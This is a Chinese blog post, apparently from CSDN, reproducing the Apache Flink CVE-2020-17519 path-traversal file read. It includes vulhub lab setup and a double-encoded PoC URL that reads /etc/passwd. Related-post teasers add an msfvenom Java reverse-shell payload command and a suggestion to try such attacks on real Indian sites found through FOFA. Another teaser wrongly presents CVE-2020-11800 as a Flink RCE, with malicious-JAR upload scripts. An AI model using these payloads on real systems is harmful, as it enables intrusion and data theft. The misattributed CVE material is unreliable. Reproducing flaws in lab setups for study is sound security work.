CVE-2020-17519 漏洞复现

Apache Flink CVE-2020-17519：任意文件读取漏洞分析

最新推荐文章于 2025-06-06 15:42:04 发布

原创最新推荐文章于 2025-06-06 15:42:04 发布 · 1.5k 阅读

0 ·

CC 4.0 BY-SA版权

CVE-2020-17519

0x00 简介

Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述

CVE-2020-17519 任意文件读取漏洞

Apache Flink 1.11.0中引入了一项更新，该更新在1.11.1及更高的版本和1.11.2中发布。

该项更新允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件。

0x02 影响版本

至目前最新版本Apache Flink

1.11.0

1.11.1

1.11.2

0x03 环境搭建

测试环境：Flink 1.11.1 java8+
Apache Flink 1.11.1安装包下载

https://archive.apache.org/dist/flink/flink-1.11.1/flink-1.11.1-bin-scala_2.11.tgz

解压后进入bin文件夹，运行./start-cluster.sh

或者在虚拟机内搭建 docker 环境

https://www.jianshu.com/p/996e08b7976d

然后
git clone https://github.com/phith0n/vulhub.git

验证Flink启动之后，默认web 端口8081是否正常

访问http://ip:8081/可看到环境页面

0x04 漏洞利用

POC：http://you-ip/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

具体的快乐，就留给各位自己体会了

http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252fer..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

xiaohuanxong

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)

qq_51577576的博客

09-26

3855

[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日，Apache Flink官方发布安全更新，修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞，漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API，但其实现上存在多处缺陷，攻击者可通过REST API使用../跳目录实现系统任意文件读取。

Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

Senimo

07-28

1238

Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接一、漏洞描述 ApacheFlink是一个开源的流处理框架，具有强大的流处理和批处理功能。 Apache Flink 1.11.0 中引入的更改（以及在 1.11.1 和1.11.2 中发布）允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。访问仅限于

参与评论您还未登录，请先登录后发表或查看评论

Apache Flink CVE-2020-17519

weixin_45682070的博客

02-04

327

fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行，找一个阿三的站试试 1：上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve

Apache Flink漏洞（CVE-2020-17519）复现以及suricata规则检测

ranuy阮的博客

01-06

1648

0x01 漏洞简介 Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 0x02 影响版本 1.11.0 1.11.1 1.11.2 0x03 环境搭建 svn export https://github.com/vulhub/vulhub/trunk/flink/ 进入CVE-2

[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)

Matrix42

01-07

2377

2021年1月5日，Apache Flink官方发布安全更新，修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞： CVE-2020-17519：攻击者可通过REST API使用…/跳目录实现系统任意文件读取； CVE-2020-17518：通过构造恶意的http header，可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API，但其实现上存在多处缺陷，导致目录遍历

Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞复现

挚爱凝华的博客

04-13

3486

搭建环境浏览器访问ip:8081端口构造payload访问passwd文件原理：利用 JobManager 的 REST API，读取 JobManager 本地文件系统上的任意文件（JobManager 进程有权限能够读取到的文件）。修复漏洞：升级到1.11.3或1.12.0版本 ...

Apache Flink(CVE-2020-17519)路径遍历漏洞复现_附POC和批量检测脚本

深耕网络安全领域，聚焦护网行动（HW）、渗透测试、等级保护（等保）、CTF 竞赛四大核心方向，提供技术干货、实战经验与行业洞察。

01-06

1103

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。 Apache Flink 是高效和分布式的通用数据处理平台。 Apache Flink 声明式的数据分析开源系统，结合了分布式 MapReduce 类平台的高效，灵活的

Linux本地内核提权漏洞复现(CVE-2019-13272)

m0_48520508的博客

01-19

908

0x00简介在5.1.17之前的Linux内核中，kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录，这允许本地用户通过利用父子的某些方案来获取root访问权限进程关系，父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时，ptrace_link函数将获得对父进程凭据的RCU引用，然后将该指针指向get_cred函数，但是，对象struct cred的生存周期规则不允许无条.

精选资源

OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

03-31

本篇将详细讨论如何修补OpenSSH中的几个已知漏洞，包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。首先，让我们了解这些特定的漏洞： 1. CVE-2020-15778：这是一个与OpenSSH密钥协商过程相关的漏洞，可能...

VMware_ESXI_OpenSLP漏洞利用代码集合_针对CVE-2020-3992和CVE-2019-5544的安全研究项目_提供漏洞复现和测试环境搭建指南_适用于虚拟化平台安.zip

最新发布

09-05

VMware_ESXI_OpenSLP漏洞利用代码集合_针对CVE-2020-3992和CVE-2019-5544的安全研究项目_提供漏洞复现和测试环境搭建指南_适用于虚拟化平台安.zip

精选资源

XStream1.4.16反序列化漏洞（CVE-2020-26258、CVE-2020-26259）

05-08

近日XStream官方发布安全更新，修复了XStream 反序列化漏洞（CVE-2020-26258、CVE-2020-26259）。攻击者通过构造恶意的XML文档，可绕过XStream的黑名单，触发反序列化，从而造成CVE-2020-26258 SSRF漏洞，以及 CVE-...

CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)

05-30

使用方法&免责声明该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。使用方法：Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行，漏洞地址输出在vul.txt中影响版本： Apache Flink 1.11.0、1.11.1、1.11.2 工具仅用于安全人员安全测试，任何未授权检测造成的直接或者间接的后果及损失，均由使用者本人负责

CVE-2020-17519:CVE-2020-17519猎豹

04-17

CVE-2020-17519 CVE-2020-17519 Cheetah语言版，支持批量扫描。将ip.txt复制到/script/漏洞探测/Apache/文件夹下，打开Wker主程序

精选资源

CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE

05-31

描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl）。如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...

Apache Flink 目录遍历漏洞 CVE-2020-17519

m0_54323635的博客

08-31

692

2021年01月06日，360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告，漏洞编号为CVE-2020-17518,CVE-2020-17519，漏洞等级：高危，漏洞评分：8.5。Apache Flink 1.11.0 中引入的一项更改（也在 1.11.1 和 1.11.2 中发布）允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)

spinage的博客

06-06

1307

Apache Flink REST API 存在任意文件读取漏洞（CVE-2020-17519，CVSS 7.5），影响1.11.0-1.11.2版本。该漏洞源于JobManager的REST接口未对/jobmanager/logs/<filename>路径进行规范化校验，攻击者可通过双重URL编码（%252f）绕过防护，读取系统敏感文件（如/etc/passwd）。官方在1.11.3/1.12.0版本中通过normalize()路径标准化和边界校验修复漏洞。临时缓解建议包括网络隔离、代理过滤和启用认证。

漏洞复现----12、Apache Flink目录穿越漏洞（CVE-2020-17519 ）

七天

11-10

3038

文章目录一、漏洞简介二、漏洞复现一、漏洞简介 Apache Flink 1.11.0中引入的更改，允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。影响版本： 1.11.0、1.11.1、1.11.2 二、漏洞复现 Payload： 192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f

Apache Flink -任意文件读取漏洞（CVE-2020-17519）

chaojixiaojingang

01-06

1323

1.漏洞描述 Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 2.影响版本 1.11.0 1.11.1 1.11.2 3.POC /jobmanager/logs/..%252f..%252f..%252f..%252f..%252...

cve-2020-11800漏洞复现

06-21

### CVE-2020-11800 漏洞概述 CVE-2020-11800 是一个与 Apache Flink 相关的漏洞，该漏洞允许攻击者通过构造恶意请求来实现远程代码执行（RCE）。此漏洞的根本原因在于 Apache Flink 的 Web 界面未对用户输入进行充分验证，导致未经授权的用户可以发送特定的 HTTP 请求以执行任意代码[^4]。 ### 漏洞复现环境配置为了复现 CVE-2020-11800 漏洞，需要搭建一个包含漏洞版本的 Apache Flink 环境。以下是具体步骤： #### 1. 克隆 Vulhub 仓库 Vulhub 是一个用于搭建漏洞复现环境的开源项目，可以通过以下命令克隆其仓库到本地： ```bash git clone https://github.com/vulhub/vulhub.git ``` #### 2. 定位漏洞环境路径在 Vulhub 仓库中，Apache Flink 的漏洞环境路径为 `vulhub/flink/CVE-2020-11800`。进入该目录： ```bash cd vulhub/flink/CVE-2020-11800 ``` #### 3. 启动漏洞环境使用 Docker Compose 启动漏洞环境： ```bash docker-compose up -d ``` 这将启动一个包含漏洞版本的 Apache Flink 环境[^5]。 #### 4. 验证环境是否正常运行访问 Flink 的 Web 界面，默认地址为 `http://your-ip:8081`，确认页面能够正常加载。 ### 漏洞复现步骤 #### 1. 构造恶意请求利用漏洞的关键在于向 Flink 的 Web 界面发送恶意的 HTTP 请求。以下是一个示例 Python 脚本，用于触发远程代码执行： ```python import requests url = "http://target-ip:8081/jars/upload" files = { 'file': open('malicious.jar', 'rb') # 替换为实际的恶意 JAR 文件 } response = requests.post(url, files=files) print(response.text) ``` #### 2. 执行命令上传恶意 JAR 文件后，可以通过以下接口执行命令： ```python import requests url = "http://target-ip:8081/jars/execute" data = { "programArgs": "", "savepointPath": "", "parallelism": 1, "entryClass": "malicious.Main" # 替换为恶意类的主入口 } response = requests.post(url, json=data) print(response.text) ``` ### 注意事项在测试过程中，确保只在授权的环境中进行操作，避免对生产系统造成影响。此外，及时更新 Apache Flink 至最新版本以修复此漏洞[^6]。 ---